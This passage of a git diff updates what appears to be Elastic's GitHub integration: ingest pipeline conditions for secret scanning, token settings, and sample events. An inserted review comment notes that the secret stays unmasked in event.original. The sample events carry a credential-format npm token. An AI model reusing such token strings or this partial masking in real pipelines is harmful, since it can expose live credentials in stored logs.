working\",\"id\":208045946,\"name\":\"bug\",\"node_id\":\"MDU6TGFiZWwyMDgwNDU5NDY=\",\"url\":\"https://api.github.com/repos/octocat/Hello-World/labels/bug\"}],\"labels_url\":\"https://api.github.com/repos/octocat/Hello-World/issues/1347/labels{/name}\",\"locked\":true,\"milestone\":{\"closed_at\":\"2013-02-12T13:22:01Z\",\"closed_issues\":8,\"created_at\":\"2011-04-10T20:09:31Z\",\"creator\":{\"avatar_url\":\"https://github.com/images/error/octocat_happy.gif\",\"events_url\":\"https://api.github.com/users/octocat/events{/privacy}\",\"followers_url\":\"https://api.github.com/users/octocat/followers\",\"following_url\":\"https://api.github.com/users/octocat/following{/other_user}\",\"gists_url\":\"https://api.github.com/users/octocat/gists{/gist_id}\",\"gravatar_id\":\"\",\"html_url\":\"https://github.com/octocat\",\"id\":1,\"login\":\"octocat\",\"node_id\":\"MDQ6VXNlcjE=\",\"organizations_url\":\"https://api.github.com/users/octocat/orgs\",\"received_events_url\":\"https://api.github.com/users/octocat/received_events\",\"repos_url\":\"https://api.github.com/users/octocat/repos\",\"site_admin\":false,\"starred_url\":\"https://api.github.com/users/octocat/starred{/owner}{/repo}\",\"subscriptions_url\":\"https://api.github.com/users/octocat/subscriptions\",\"type\":\"User\",\"url\":\"https://api.github.com/users/octocat\"},\"description\":\"Tracking milestone for version 
1.0\",\"due_on\":\"2012-10-09T23:39:01Z\",\"html_url\":\"https://github.com/octocat/Hello-World/milestones/v1.0\",\"id\":1002604,\"labels_url\":\"https://api.github.com/repos/octocat/Hello-World/milestones/1/labels\",\"node_id\":\"MDk6TWlsZXN0b25lMTAwMjYwNA==\",\"number\":1,\"open_issues\":4,\"state\":\"open\",\"title\":\"v1.0\",\"updated_at\":\"2014-03-03T18:58:10Z\",\"url\":\"https://api.github.com/repos/octocat/Hello-World/milestones/1\"},\"node_id\":\"MDU6SXNzdWUx\",\"number\":1347,\"pull_request\":{\"diff_url\":\"https://github.com/octocat/Hello-World/pull/1347.diff\",\"html_url\":\"https://github.com/octocat/Hello-World/pull/1347\",\"patch_url\":\"https://github.com/octocat/Hello-World/pull/1347.patch\",\"url\":\"https://api.github.com/repos/octocat/Hello-World/pulls/1347\"},\"repository_url\":\"https://api.github.com/repos/octocat/Hello-World\",\"state\":\"open\",\"state_reason\":\"completed\",\"title\":\"Found a bug\",\"updated_at\":\"2011-04-22T13:33:48Z\",\"url\":\"https://api.github.com/repos/octocat/Hello-World/issues/1347\",\"user\":{\"avatar_url\":\"https://github.com/images/error/octocat_happy.gif\",\"events_url\":\"https://api.github.com/users/octocat/events{/privacy}\",\"followers_url\":\"https://api.github.com/users/octocat/followers\",\"following_url\":\"https://api.github.com/users/octocat/following{/other_user}\",\"gists_url\":\"https://api.github.com/users/octocat/gists{/gist_id}\",\"gravatar_id\":\"\",\"html_url\":\"https://github.com/octocat\",\"id\":1,\"login\":\"octocat\",\"node_id\":\"MDQ6VXNlcjE=\",\"organizations_url\":\"https://api.github.com/users/octocat/orgs\",\"received_events_url\":\"https://api.github.com/users/octocat/received_events\",\"repos_url\":\"https://api.github.com/users/octocat/repos\",\"site_admin\":false,\"starred_url\":\"https://api.github.com/users/octocat/starred{/owner}{/repo}\",\"subscriptions_url\":\"https://api.github.com/users/octocat/subscriptions\",\"type\":\"User\",\"url\":\"https://api.github.com/users/oct
ocat\"}}"
 },
@@ -124,4 +124,4 @@
 "id": "1",
 "name": "octocat"
 }
-}
+}
\ No newline at end of file
diff --git a/packages/github/data_stream/secret_scanning/elasticsearch/ingest_pipeline/default.yml b/packages/github/data_stream/secret_scanning/elasticsearch/ingest_pipeline/default.yml
index 6a3e634ccb2..43f7b832649 100644
--- a/packages/github/data_stream/secret_scanning/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/github/data_stream/secret_scanning/elasticsearch/ingest_pipeline/default.yml
@@ -15,6 +15,9 @@ processors:
 - json:
 field: event.original
 target_field: github.secret_scanning
+ - fail:
+ if: "!(ctx.github.secret_scanning instanceof Map)"
+ message: Missing JSON object
 - fingerprint:
 fields:
 - github.secret_scanning.number
@@ -25,28 +28,28 @@ processors:
 - set:
 copy_from: github.secret_scanning.created_at
 field: event.created
- if: ctx.github.secret_scanning?.created_at != null
+ if: ctx.github.secret_scanning.created_at != null
 - date:
 field: github.secret_scanning.created_at
 formats:
 - ISO8601
 timezone: UTC
 target_field: "@timestamp"
- if: ctx.github.secret_scanning?.created_at != null && ctx.github.secret_scanning?.updated_at == null && ctx.github.secret_scanning?.resolved_at == null
+ if: ctx.github.secret_scanning.created_at != null && ctx.github.secret_scanning.updated_at == null && ctx.github.secret_scanning.resolved_at == null
 - date:
 field: github.secret_scanning.updated_at
 formats:
 - ISO8601
 timezone: UTC
 target_field: "@timestamp"
- if: ctx.github.secret_scanning?.updated_at != null && ctx.github.secret_scanning?.resolved_at == null
+ if: ctx.github.secret_scanning.updated_at != null && ctx.github.secret_scanning.resolved_at == null
 - date:
 field: github.secret_scanning.resolved_at
 formats:
 - ISO8601
 timezone: UTC
 target_field: "@timestamp"
- if: ctx.github.secret_scanning?.resolved_at != null
+ if: ctx.github.secret_scanning.resolved_at != null
 - rename:
 target_field: _temp.repository
 field: github.secret_scanning.repository
@@ -172,7 +175,7 @@ processors:
 - rename:
 field: _temp.number
 target_field: github.secret_scanning.number
- if: ctx.github.secret_scanning?.number == null
+ if: ctx.github.secret_scanning.number == null
 ignore_missing: true
 - lowercase:
 field: github.secret_scanning.state
@@ -180,7 +183,7 @@ processors:
 - set:
 field: github.state
 value: "{{github.secret_scanning.state}}"
- if: ctx.github.secret_scanning?.state != null
+ if: ctx.github.secret_scanning.state != null
 - set:
 field: github.severity
 value: "undefined"
@@ -228,7 +231,7 @@ processors:
 - script:
 lang: painless
 description: Mask the secret if hide_secret is true
- if: ctx.tags != null && ctx.tags.contains('hide_secret') && ctx.github?.secret_scanning?.secret != null
+ if: ctx.tags != null && ctx.tags.contains('hide_secret') && ctx.github.secret_scanning.secret != null
 source: |
 def secret = ctx.github.secret_scanning.secret.toString();
 def masked_secret = secret;
@@ -240,7 +243,7 @@ processors:
 - script:
 lang: painless
 description: Calculate time taken to resolve the secrets
- if: ctx.github.secret_scanning?.resolved_at != null
+ if: ctx.github.secret_scanning.resolved_at != null
 source: |
 def time_to_resolution = new HashMap();
 def resolvedAtDt = ctx.github.secret_scanning.resolved_at;
@@ -260,7 +263,7 @@ processors:
 ignore_missing: true
 - remove:
 field: event.original
- if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))"
+ if: ctx.tags?.contains('preserve_original_event') != true
 ignore_failure: true
 ignore_missing: true
 - script:
diff --git a/packages/github/data_stream/secret_scanning/manifest.yml b/packages/github/data_stream/secret_scanning/manifest.yml
index a74acf45cf3..6ad4da6d26f 100644
--- a/packages/github/data_stream/secret_scanning/manifest.yml
+++ b/packages/github/data_stream/secret_scanning/manifest.yml
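Review bot: The rewritten `if:` on the masking script still gates only the rewrite of `github.secret_scanning.secret`, so when `preserve_original_event` is set alongside `hide_secret` the plaintext token survives verbatim in `event.original` — the secret_scanning sample event in this same diff carries both tags and the full `npm_…` value inside `event.original`. Since `hide_secret` is the control an operator reaches for to keep live credentials out of the index, the later `remove` of `event.original` being tag-dependent means the masking is only partial by default. If that is intended, say so on the processor, e.g. `description: Mask github.secret_scanning.secret when the hide_secret tag is set; event.original is not masked and is kept only with preserve_original_event`; otherwise the same replacement should be applied to `ctx.event.original` (a string, so a `replace` on the raw token) before the `remove` processor runs. The masking script's body continues past the end of this hunk, so I cannot see the replacement it performs.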
@@ -4,12 +4,13 @@ streams:
 - input: httpjson
 vars:
 - name: access_token
- type: text
+ type: password
 title: Personal Access Token
 description: the GitHub Personal Access Token. Requires `admin` access to the repository or organization owning the repository along with a personal access token with 'public_repo' scope for public repositories and `repo` or `security_events` scope for private repositories. \nSee [List secret scanning alerts for a repository](https://docs.github.com/en/enterprise-cloud@latest/rest/secret-scanning#list-secret-scanning-alerts-for-a-repository)
 multi: false
 required: true
 show_user: true
+ secret: true
 - name: owner
 type: text
 title: Repository owner
@@ -48,6 +49,7 @@ streams:
 type: bool
 multi: false
 default: true
+ secret: false
 - name: api_url
 type: text
 title: API URL.
diff --git a/packages/github/data_stream/secret_scanning/sample_event.json b/packages/github/data_stream/secret_scanning/sample_event.json
index 0a0e0407946..3c3bd9328ae 100644
--- a/packages/github/data_stream/secret_scanning/sample_event.json
+++ b/packages/github/data_stream/secret_scanning/sample_event.json
@@ -1,11 +1,11 @@
 {
 "@timestamp": "2022-06-30T18:07:27.000Z",
 "agent": {
- "ephemeral_id": "055b4216-543e-43cb-966b-f9f71d8b6144",
- "id": "f86f831a-cae2-454f-a985-4f579b0ee515",
+ "ephemeral_id": "85b829d8-54c4-4280-960b-6ca42b7c1772",
+ "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c",
 "name": "docker-fleet-agent",
 "type": "filebeat",
- "version": "8.7.1"
+ "version": "8.12.0"
 },
 "data_stream": {
 "dataset": "github.secret_scanning",
@@ -16,16 +16,16 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "snapshot": false, - "version": "8.7.1" + "version": "8.12.0" }, "event": { "action": "secret_scanning", "agent_id_status": "verified", "created": "2022-06-30T18:07:27Z", "dataset": "github.secret_scanning", - "ingested": "2023-09-28T21:03:11Z", + "ingested": "2024-01-18T16:01:42Z", "original": "{\"created_at\":\"2022-06-30T18:07:27Z\",\"html_url\":\"https://github.com/sample_owner/sample_repo/security/secret-scanning/3\",\"number\":3,\"push_protection_bypassed\":true,\"push_protection_bypassed_by\":{\"html_url\":\"https://github.com/sample_owner\",\"login\":\"sample_owner\",\"type\":\"User\",\"url\":\"https://api.github.com/users/sample_owner\"},\"resolution\":\"revoked\",\"resolved_by\":{\"login\":\"sample_owner\",\"type\":\"User\",\"url\":\"https://api.github.com/users/sample_owner\"},\"secret\":\"npm_2vYJ3QzGXoGbEgMYduYS1k2M4D0wDu2opJbl\",\"secret_type\":\"npm_access_token\",\"secret_type_display_name\":\"npm Access Token\",\"state\":\"open\",\"url\":\"https://api.github.com/repos/sample_owner/sample_repo/secret-scanning/alerts/3\"}" }, "github": { @@ -72,4 +72,4 @@ "preserve_original_event", "hide_secret" ] -} +} \ No newline at end of file diff --git a/packages/github/docs/README.md b/packages/github/docs/README.md index 917ddb4595e..0ca08ce09bb 100644 --- a/packages/github/docs/README.md +++ b/packages/github/docs/README.md @@ -97,11 +97,11 @@ An example event for `audit` looks as following: { "@timestamp": "2020-11-18T17:05:48.837Z", "agent": { - "ephemeral_id": "fbdd879c-8de1-464b-a6a2-dbd9847eff73", - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "ephemeral_id": "9246e7d9-fcc1-46ab-b3fd-2d0888f2a94d", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.7.1" + "version": "8.12.0" }, "data_stream": { "dataset": "github.audit", 
@@ -112,9 +112,9 @@ An example event for `audit` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "snapshot": false, - "version": "8.7.1" + "version": "8.12.0" }, "event": { "action": "repo.destroy", @@ -123,10 +123,10 @@ An example event for `audit` looks as following: "configuration", "web" ], - "created": "2023-09-28T20:59:05.392Z", + "created": "2024-01-18T15:58:09.826Z", "dataset": "github.audit", "id": "LwW2vpJZCDS-WUmo9Z-ifw", - "ingested": "2023-09-28T20:59:06Z", + "ingested": "2024-01-18T15:58:19Z", "kind": "event", "original": "{\"@timestamp\":1605719148837,\"_document_id\":\"LwW2vpJZCDS-WUmo9Z-ifw\",\"action\":\"repo.destroy\",\"actor\":\"monalisa\",\"created_at\":1605719148837,\"org\":\"mona-org\",\"repo\":\"mona-org/mona-test-repo\",\"visibility\":\"private\"}", "type": [ @@ -155,7 +155,6 @@ An example event for `audit` looks as following: "name": "monalisa" } } - ``` @@ -268,11 +267,11 @@ An example event for `code_scanning` looks as following: { "@timestamp": "2022-06-29T18:03:27.000Z", "agent": { - "ephemeral_id": "1a42d4f4-d9bb-4b37-ad28-0da74f732b5b", - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "ephemeral_id": "b359acfc-81ff-4631-8a85-05f9627d12e4", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.7.1" + "version": "8.12.0" }, "data_stream": { "dataset": "github.code_scanning", 
@@ -283,16 +282,16 @@ An example event for `code_scanning` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "snapshot": false, - "version": "8.7.1" + "version": "8.12.0" }, "event": { "action": "code_scanning", "agent_id_status": "verified", "created": "2022-06-29T18:03:27.000Z", "dataset": "github.code_scanning", - "ingested": "2023-09-28T21:00:06Z", + "ingested": "2024-01-18T15:59:07Z", "kind": "alert", "original": "{\"created_at\":\"2022-06-29T18:03:27Z\",\"html_url\":\"https://github.com/sample_owner/sample_repo/security/code-scanning/91\",\"most_recent_instance\":{\"analysis_key\":\".github/workflows/codeql-analysis.yml:analyze\",\"category\":\".github/workflows/codeql-analysis.yml:analyze/language:javascript\",\"classifications\":[],\"commit_sha\":\"3244e8b15cc1b8f2732eecd69fc1890b737f0dda\",\"location\":{\"end_column\":50,\"end_line\":67,\"path\":\"routes/chatbot.ts\",\"start_column\":23,\"start_line\":67},\"message\":{\"text\":\"(Experimental) This may be a database query that depends on a user-provided value. Identified using machine learning.(Experimental) This may be a database query that depends on a user-provided value. Identified using machine learning.\"},\"ref\":\"refs/heads/master\",\"state\":\"open\"},\"number\":90,\"rule\":{\"description\":\"SQL database query built from user-controlled sources (experimental)\",\"id\":\"js/ml-powered/sql-injection\",\"security_severity_level\":\"high\",\"severity\":\"error\",\"tags\":[\"experimental\",\"external/cwe/cwe-089\",\"security\"]},\"state\":\"open\",\"tool\":{\"name\":\"CodeQL\",\"version\":\"2.9.4\"},\"updated_at\":\"2022-06-29T18:03:27Z\",\"url\":\"https://api.github.com/repos/sample_owner/sample_repo/code-scanning/alerts/91\"}" }, @@ -355,7 +354,6 @@ An example event for `code_scanning` looks as following: "security" ] } - ``` 
@@ -446,11 +444,11 @@ An example event for `secret_scanning` looks as following: { "@timestamp": "2022-06-30T18:07:27.000Z", "agent": { - "ephemeral_id": "055b4216-543e-43cb-966b-f9f71d8b6144", - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "ephemeral_id": "85b829d8-54c4-4280-960b-6ca42b7c1772", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.7.1" + "version": "8.12.0" }, "data_stream": { "dataset": "github.secret_scanning", @@ -461,16 +459,16 @@ An example event for `secret_scanning` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "snapshot": false, - "version": "8.7.1" + "version": "8.12.0" }, "event": { "action": "secret_scanning", "agent_id_status": "verified", "created": "2022-06-30T18:07:27Z", "dataset": "github.secret_scanning", - "ingested": "2023-09-28T21:03:11Z", + "ingested": "2024-01-18T16:01:42Z", "original": "{\"created_at\":\"2022-06-30T18:07:27Z\",\"html_url\":\"https://github.com/sample_owner/sample_repo/security/secret-scanning/3\",\"number\":3,\"push_protection_bypassed\":true,\"push_protection_bypassed_by\":{\"html_url\":\"https://github.com/sample_owner\",\"login\":\"sample_owner\",\"type\":\"User\",\"url\":\"https://api.github.com/users/sample_owner\"},\"resolution\":\"revoked\",\"resolved_by\":{\"login\":\"sample_owner\",\"type\":\"User\",\"url\":\"https://api.github.com/users/sample_owner\"},\"secret\":\"npm_2vYJ3QzGXoGbEgMYduYS1k2M4D0wDu2opJbl\",\"secret_type\":\"npm_access_token\",\"secret_type_display_name\":\"npm Access Token\",\"state\":\"open\",\"url\":\"https://api.github.com/repos/sample_owner/sample_repo/secret-scanning/alerts/3\"}" }, "github": { @@ -518,7 +516,6 @@ An example event for `secret_scanning` looks as following: "hide_secret" ] } - ``` ### Dependabot 
@@ -634,11 +631,11 @@ An example event for `dependabot` looks as following: { "@timestamp": "2022-07-11T11:39:07.000Z", "agent": { - "ephemeral_id": "d5a942e6-27ef-4ef0-b922-fbc0084f6e1c", - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "ephemeral_id": "786d0d42-a64a-43ae-846d-03d72b473384", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.7.1" + "version": "8.12.0" }, "data_stream": { "dataset": "github.dependabot", 
@@ -649,16 +646,16 @@ An example event for `dependabot` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "snapshot": false, - "version": "8.7.1" + "version": "8.12.0" }, "event": { "action": "dependabot", "agent_id_status": "verified", "created": "2022-07-11T11:39:07.000Z", "dataset": "github.dependabot", - "ingested": "2023-09-28T21:01:11Z", + "ingested": "2024-01-18T15:59:57Z", "kind": "alert", "original": "{\"createdAt\":\"2022-07-11T11:39:07Z\",\"dependabotUpdate\":{\"error\":{\"body\":\"The currently installed version can't be determined.\\n\\nTo resolve the issue add a supported lockfile (package-lock.json or yarn.lock).\",\"errorType\":\"dependency_file_not_supported\",\"title\":\"Dependabot can't update vulnerable dependencies without a lockfile\"},\"pullRequest\":null},\"dependencyScope\":\"RUNTIME\",\"dismissReason\":null,\"dismissedAt\":null,\"dismisser\":null,\"fixedAt\":null,\"number\":1,\"repository\":{\"description\":\"OWASP Juice Shop: Probably the most modern and sophisticated insecure web application\",\"isInOrganization\":false,\"isPrivate\":false,\"name\":\"sample_repo\",\"owner\":{\"login\":\"sample_owner\",\"url\":\"https://github.com/sample_owner\"},\"url\":\"https://github.com/sample_owner/sample_repo\"},\"securityAdvisory\":{\"classification\":\"GENERAL\",\"cvss\":{\"score\":0,\"vectorString\":null},\"cwes\":{\"nodes\":[{\"cweId\":\"CWE-20\",\"description\":\"The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.\",\"name\":\"Improper Input Validation\"}]},\"description\":\"Versions 4.2.1 and earlier of `jsonwebtoken` are affected by a verification bypass vulnerability. 
This is a result of weak validation of the JWT algorithm type, occuring when an attacker is allowed to arbitrarily specify the JWT algorithm.\\n\\n\\n\\n\\n## Recommendation\\n\\nUpdate to version 4.2.2 or later.\",\"ghsaId\":\"GHSA-c7hr-j4mj-j2w6\",\"identifiers\":[{\"type\":\"GHSA\",\"value\":\"GHSA-c7hr-j4mj-j2w6\"},{\"type\":\"CVE\",\"value\":\"CVE-2015-9235\"}],\"origin\":\"UNSPECIFIED\",\"permalink\":\"https://github.com/advisories/GHSA-c7hr-j4mj-j2w6\",\"publishedAt\":\"2018-10-09T00:38:30Z\",\"references\":[{\"url\":\"https://nvd.nist.gov/vuln/detail/CVE-2015-9235\"},{\"url\":\"https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687\"},{\"url\":\"https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/\"},{\"url\":\"https://github.com/advisories/GHSA-c7hr-j4mj-j2w6\"},{\"url\":\"https://www.npmjs.com/advisories/17\"},{\"url\":\"https://www.timmclean.net/2015/02/25/jwt-alg-none.html\"},{\"url\":\"https://nodesecurity.io/advisories/17\"}],\"severity\":\"CRITICAL\",\"summary\":\"Verification Bypass in jsonwebtoken\",\"updatedAt\":\"2021-01-08T19:00:39Z\",\"withdrawnAt\":null},\"securityVulnerability\":{\"firstPatchedVersion\":{\"identifier\":\"4.2.2\"},\"package\":{\"ecosystem\":\"NPM\",\"name\":\"jsonwebtoken\"},\"severity\":\"CRITICAL\",\"updatedAt\":\"2018-11-30T19:54:28Z\",\"vulnerableVersionRange\":\"\\u003c 4.2.2\"},\"state\":\"OPEN\",\"vulnerableManifestFilename\":\"package.json\",\"vulnerableManifestPath\":\"package.json\",\"vulnerableRequirements\":\"= 0.4.0\"}", "start": "2022-07-11T11:39:07Z" @@ -679,7 +676,7 @@ An example event for `dependabot` looks as following: "classification": "GENERAL", "cwes": [ { - "cweId": "CWE-20", + "cwe_id": "CWE-20", "description": "The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.", "name": "Improper Input Validation" } 
@@ -763,7 +760,6 @@ An example event for `dependabot` looks as following: "severity": "critical" } } - ``` ### Issues @@ -885,11 +881,11 @@ An example event for `issues` looks as following: { "@timestamp": "2011-04-22T13:33:48.000Z", "agent": { - "ephemeral_id": "f9522412-8a4b-49a9-9c7c-0f5e5925ca64", - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "ephemeral_id": "584c482b-3ffa-4d41-8926-c8194940a361", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.7.1" + "version": "8.12.0" }, "data_stream": { "dataset": "github.issues", 
@@ -900,16 +896,16 @@ An example event for `issues` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "snapshot": false, - "version": "8.7.1" + "version": "8.12.0" }, "event": { "action": "event", "agent_id_status": "verified", "created": "2011-04-22T13:33:48.000Z", "dataset": "github.issues", - "ingested": "2023-09-28T21:02:11Z", + "ingested": "2024-01-18T16:00:55Z", "kind": "event", "original": "{\"active_lock_reason\":\"too heated\",\"assignee\":{\"avatar_url\":\"https://github.com/images/error/octocat_happy.gif\",\"events_url\":\"https://api.github.com/users/octocat/events{/privacy}\",\"followers_url\":\"https://api.github.com/users/octocat/followers\",\"following_url\":\"https://api.github.com/users/octocat/following{/other_user}\",\"gists_url\":\"https://api.github.com/users/octocat/gists{/gist_id}\",\"gravatar_id\":\"\",\"html_url\":\"https://github.com/octocat\",\"id\":1,\"login\":\"octocat\",\"node_id\":\"MDQ6VXNlcjE=\",\"organizations_url\":\"https://api.github.com/users/octocat/orgs\",\"received_events_url\":\"https://api.github.com/users/octocat/received_events\",\"repos_url\":\"https://api.github.com/users/octocat/repos\",\"site_admin\":false,\"starred_url\":\"https://api.github.com/users/octocat/starred{/owner}{/repo}\",\"subscriptions_url\":\"https://api.github.com/users/octocat/subscriptions\",\"type\":\"User\",\"url\":\"https://api.github.com/users/octocat\"},\"assignees\":[{\"avatar_url\":\"https://github.com/images/error/octocat_happy.gif\",\"events_url\":\"https://api.github.com/users/octocat/events{/privacy}\",\"followers_url\":\"https://api.github.com/users/octocat/followers\",\"following_url\":\"https://api.github.com/users/octocat/following{/other_user}\",\"gists_url\":\"https://api.github.com/users/octocat/gists{/gist_id}\",\"gravatar_id\":\"\",\"html_url\":\"https://github.com/octocat\",\"id\":1,\"login\":\"octocat\",\"node_id\":\"MDQ
6VXNlcjE=\",\"organizations_url\":\"https://api.github.com/users/octocat/orgs\",\"received_events_url\":\"https://api.github.com/users/octocat/received_events\",\"repos_url\":\"https://api.github.com/users/octocat/repos\",\"site_admin\":false,\"starred_url\":\"https://api.github.com/users/octocat/starred{/owner}{/repo}\",\"subscriptions_url\":\"https://api.github.com/users/octocat/subscriptions\",\"type\":\"User\",\"url\":\"https://api.github.com/users/octocat\"}],\"author_association\":\"COLLABORATOR\",\"body\":\"I'm having a problem with this.\",\"closed_at\":null,\"closed_by\":{\"avatar_url\":\"https://github.com/images/error/octocat_happy.gif\",\"events_url\":\"https://api.github.com/users/octocat/events{/privacy}\",\"followers_url\":\"https://api.github.com/users/octocat/followers\",\"following_url\":\"https://api.github.com/users/octocat/following{/other_user}\",\"gists_url\":\"https://api.github.com/users/octocat/gists{/gist_id}\",\"gravatar_id\":\"\",\"html_url\":\"https://github.com/octocat\",\"id\":1,\"login\":\"octocat\",\"node_id\":\"MDQ6VXNlcjE=\",\"organizations_url\":\"https://api.github.com/users/octocat/orgs\",\"received_events_url\":\"https://api.github.com/users/octocat/received_events\",\"repos_url\":\"https://api.github.com/users/octocat/repos\",\"site_admin\":false,\"starred_url\":\"https://api.github.com/users/octocat/starred{/owner}{/repo}\",\"subscriptions_url\":\"https://api.github.com/users/octocat/subscriptions\",\"type\":\"User\",\"url\":\"https://api.github.com/users/octocat\"},\"comments\":0,\"comments_url\":\"https://api.github.com/repos/octocat/Hello-World/issues/1347/comments\",\"created_at\":\"2011-04-22T13:33:48Z\",\"events_url\":\"https://api.github.com/repos/octocat/Hello-World/issues/1347/events\",\"html_url\":\"https://github.com/octocat/Hello-World/issues/1347\",\"id\":1,\"labels\":[{\"color\":\"f29513\",\"default\":true,\"description\":\"Something isn't 
working\",\"id\":208045946,\"name\":\"bug\",\"node_id\":\"MDU6TGFiZWwyMDgwNDU5NDY=\",\"url\":\"https://api.github.com/repos/octocat/Hello-World/labels/bug\"}],\"labels_url\":\"https://api.github.com/repos/octocat/Hello-World/issues/1347/labels{/name}\",\"locked\":true,\"milestone\":{\"closed_at\":\"2013-02-12T13:22:01Z\",\"closed_issues\":8,\"created_at\":\"2011-04-10T20:09:31Z\",\"creator\":{\"avatar_url\":\"https://github.com/images/error/octocat_happy.gif\",\"events_url\":\"https://api.github.com/users/octocat/events{/privacy}\",\"followers_url\":\"https://api.github.com/users/octocat/followers\",\"following_url\":\"https://api.github.com/users/octocat/following{/other_user}\",\"gists_url\":\"https://api.github.com/users/octocat/gists{/gist_id}\",\"gravatar_id\":\"\",\"html_url\":\"https://github.com/octocat\",\"id\":1,\"login\":\"octocat\",\"node_id\":\"MDQ6VXNlcjE=\",\"organizations_url\":\"https://api.github.com/users/octocat/orgs\",\"received_events_url\":\"https://api.github.com/users/octocat/received_events\",\"repos_url\":\"https://api.github.com/users/octocat/repos\",\"site_admin\":false,\"starred_url\":\"https://api.github.com/users/octocat/starred{/owner}{/repo}\",\"subscriptions_url\":\"https://api.github.com/users/octocat/subscriptions\",\"type\":\"User\",\"url\":\"https://api.github.com/users/octocat\"},\"description\":\"Tracking milestone for version 
1.0\",\"due_on\":\"2012-10-09T23:39:01Z\",\"html_url\":\"https://github.com/octocat/Hello-World/milestones/v1.0\",\"id\":1002604,\"labels_url\":\"https://api.github.com/repos/octocat/Hello-World/milestones/1/labels\",\"node_id\":\"MDk6TWlsZXN0b25lMTAwMjYwNA==\",\"number\":1,\"open_issues\":4,\"state\":\"open\",\"title\":\"v1.0\",\"updated_at\":\"2014-03-03T18:58:10Z\",\"url\":\"https://api.github.com/repos/octocat/Hello-World/milestones/1\"},\"node_id\":\"MDU6SXNzdWUx\",\"number\":1347,\"pull_request\":{\"diff_url\":\"https://github.com/octocat/Hello-World/pull/1347.diff\",\"html_url\":\"https://github.com/octocat/Hello-World/pull/1347\",\"patch_url\":\"https://github.com/octocat/Hello-World/pull/1347.patch\",\"url\":\"https://api.github.com/repos/octocat/Hello-World/pulls/1347\"},\"repository_url\":\"https://api.github.com/repos/octocat/Hello-World\",\"state\":\"open\",\"state_reason\":\"completed\",\"title\":\"Found a bug\",\"updated_at\":\"2011-04-22T13:33:48Z\",\"url\":\"https://api.github.com/repos/octocat/Hello-World/issues/1347\",\"user\":{\"avatar_url\":\"https://github.com/images/error/octocat_happy.gif\",\"events_url\":\"https://api.github.com/users/octocat/events{/privacy}\",\"followers_url\":\"https://api.github.com/users/octocat/followers\",\"following_url\":\"https://api.github.com/users/octocat/following{/other_user}\",\"gists_url\":\"https://api.github.com/users/octocat/gists{/gist_id}\",\"gravatar_id\":\"\",\"html_url\":\"https://github.com/octocat\",\"id\":1,\"login\":\"octocat\",\"node_id\":\"MDQ6VXNlcjE=\",\"organizations_url\":\"https://api.github.com/users/octocat/orgs\",\"received_events_url\":\"https://api.github.com/users/octocat/received_events\",\"repos_url\":\"https://api.github.com/users/octocat/repos\",\"site_admin\":false,\"starred_url\":\"https://api.github.com/users/octocat/starred{/owner}{/repo}\",\"subscriptions_url\":\"https://api.github.com/users/octocat/subscriptions\",\"type\":\"User\",\"url\":\"https://api.github.com/users/oct
ocat\"}}" }, @@ -1009,5 +1005,4 @@ An example event for `issues` looks as following: "name": "octocat" } } - ``` \ No newline at end of file diff --git a/packages/github/manifest.yml b/packages/github/manifest.yml index 11b5e96f96b..e3b8ab54974 100644 --- a/packages/github/manifest.yml +++ b/packages/github/manifest.yml @@ -1,13 +1,13 @@ name: github title: GitHub -version: "1.27.2" +version: "1.28.0" description: Collect logs from GitHub with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.2" categories: [security, "productivity_security"] conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" icons: - src: /img/github.svg title: GitHub diff --git a/packages/golang/_dev/build/docs/README.md b/packages/golang/_dev/build/docs/README.md index e8dc18f8099..856500d2c7f 100644 --- a/packages/golang/_dev/build/docs/README.md +++ b/packages/golang/_dev/build/docs/README.md 
